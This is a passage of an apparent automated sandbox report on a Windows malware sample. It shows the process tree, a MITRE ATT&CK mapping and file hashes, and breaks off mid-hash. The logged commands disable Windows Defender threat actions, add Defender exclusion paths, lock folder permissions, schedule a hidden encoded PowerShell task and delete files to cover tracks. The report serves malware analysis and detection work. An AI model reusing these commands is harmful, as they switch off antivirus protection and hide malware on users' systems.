-Value 0;
3⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\67F6.tmp.exe
C:\Users\Admin\AppData\Local\Temp\67F6.tmp.exe
1⤵
PID:2668

C:\Users\Admin\AppData\Local\Temp\7611.tmp.exe
C:\Users\Admin\AppData\Local\Temp\7611.tmp.exe
1⤵
PID:5332

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
2⤵
PID:8576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Piramide.txt
2⤵
PID:8160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
3⤵
PID:7924

C:\Users\Admin\AppData\Local\Temp\7AE4.tmp.exe
C:\Users\Admin\AppData\Local\Temp\7AE4.tmp.exe
1⤵
PID:9024

C:\Users\Admin\AppData\Local\Temp\8555.exe
C:\Users\Admin\AppData\Local\Temp\8555.exe
1⤵
PID:7408

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\63d47087-ca1a-4de4-a18f-97f32790ab70" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:6616

C:\Users\Admin\AppData\Local\Temp\8555.exe
"C:\Users\Admin\AppData\Local\Temp\8555.exe" --Admin IsNotAutoStart IsNotTask
2⤵
PID:9016

C:\Users\Admin\AppData\Local\d5803882-60a2-461e-9c52-3c3937fd0453\updatewin.exe
"C:\Users\Admin\AppData\Local\d5803882-60a2-461e-9c52-3c3937fd0453\updatewin.exe"
3⤵
PID:7340

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\d5803882-60a2-461e-9c52-3c3937fd0453\updatewin.exe
4⤵
PID:6392

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
5⤵
- Delays execution with timeout.exe
PID:5688

C:\Users\Admin\AppData\Local\d5803882-60a2-461e-9c52-3c3937fd0453\5.exe
"C:\Users\Admin\AppData\Local\d5803882-60a2-461e-9c52-3c3937fd0453\5.exe"
3⤵
PID:8828

C:\Users\Admin\AppData\Local\Temp\915C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\915C.tmp.exe
1⤵
PID:444

C:\Users\Admin\AppData\Local\Temp\994C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\994C.tmp.exe
1⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\9D07.tmp.exe
C:\Users\Admin\AppData\Local\Temp\9D07.tmp.exe
1⤵
PID:3664

C:\Users\Admin\AppData\Local\Temp\A3CE.tmp.exe
C:\Users\Admin\AppData\Local\Temp\A3CE.tmp.exe
1⤵
PID:8404

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6888

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5068

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6900

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8228

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8724

C:\Users\Admin\AppData\Local\Temp\B841.exe
C:\Users\Admin\AppData\Local\Temp\B841.exe
1⤵
PID:6916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im B841.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B841.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:4368

C:\Windows\SysWOW64\taskkill.exe
taskkill /im B841.exe /f
3⤵
- Kills process with taskkill
PID:8560

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:9384

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6204

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5068

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3916

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8296

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:7140

C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\vDrhoTr.exe
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\vDrhoTr.exe 9n /site_id 754 /S
1⤵
PID:8420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:1212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2024

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1224

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:8940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:9080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:8896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:2716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:5184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:9056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:5608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:9248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:9600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:9636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:9684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:9728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:9824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:9848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:9896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:10004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6596

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:7036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7380

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:6792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:4164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:8364

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:32
3⤵
PID:8212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:64
3⤵
PID:2684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:32
3⤵
PID:7136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:64
3⤵
PID:5868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:32
3⤵
PID:4520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:64
3⤵
PID:3140

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkZdUKRlZ" /SC once /ST 16:13:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:8236

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkZdUKRlZ"
2⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\67.exe
C:\Users\Admin\AppData\Local\Temp\67.exe
1⤵
PID:6236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:8720

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You're about to be signed out -m Windows will shut down in less than a minute. -a 3
1⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\22B5.exe
C:\Users\Admin\AppData\Local\Temp\22B5.exe
1⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:7412

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3a87855 /state1:0x41c64e6d
1⤵
PID:392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:9256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:9568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:1780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6784

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:6964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:8256

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:7808

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6492

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Install Root Certificate

T1130

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

T1012

System Information Discovery

T1082

Security Software Discovery

T1063

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5
6f9501f45b2159aaf154d33a937ef6e7

SHA1
7d36f2e3b2e22637910ccb6116ba329bb2008ba3

SHA256
8224875e3a039c7e2a808e232274ae1dd9507f68a537d413eeeb71f45a061364

SHA512
96fd8786083af7af18913cc9317c8f79646a5633658e87d743aa5d6a33c991a14fbc75e0a29f4985b31078eeaf6e7412f70416fd3274a084f41e03ee3e6614c7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
MD5
afcfb0d52418ebd14a9decdc4ca5dd50

SHA1
e149c89747d97345c5ba5530ac9823ebc9a0a70c

SHA256
11414777301152817296fb00f347e88e508fd9538463b1db3bcfb0a0d77216ea

SHA512
b19c6fa2bdd7e57bb8c2b14e7c76afa4c9ebd962bd64c38804d016513f06ffe42d1a5169d9eaca391dfbb5219ec8d764fad594e3fcde2d2eb383cb259e365c1d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
e644cdbe0fd68a6ece0559497c45bf84

SHA1
c809996c27832b39bfcf183ea162f2f7c2436a0f

SHA256
082e4c7215addf5bb77a8dbba1bb9fbc2db49c0db4f84124aa3c1d2ad51f8657

SHA512
679e8bf80e8a001873f92b3c3d3e09c69f032053fad6afc451108ac1c2d5fad1bfe5b339a5dbcced6daf229d6cba5ae322929998fc51999d96576e424e3e9106

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5
a516905ac2308a2542aebad205afb423

SHA1
80053d3224ed7d99161c1a06168bce7e87cdecbb

SHA256
e9a0fb91bbada1a4121d503901691de5dfc0964fbe3add17b86baf55def2344f

SHA512
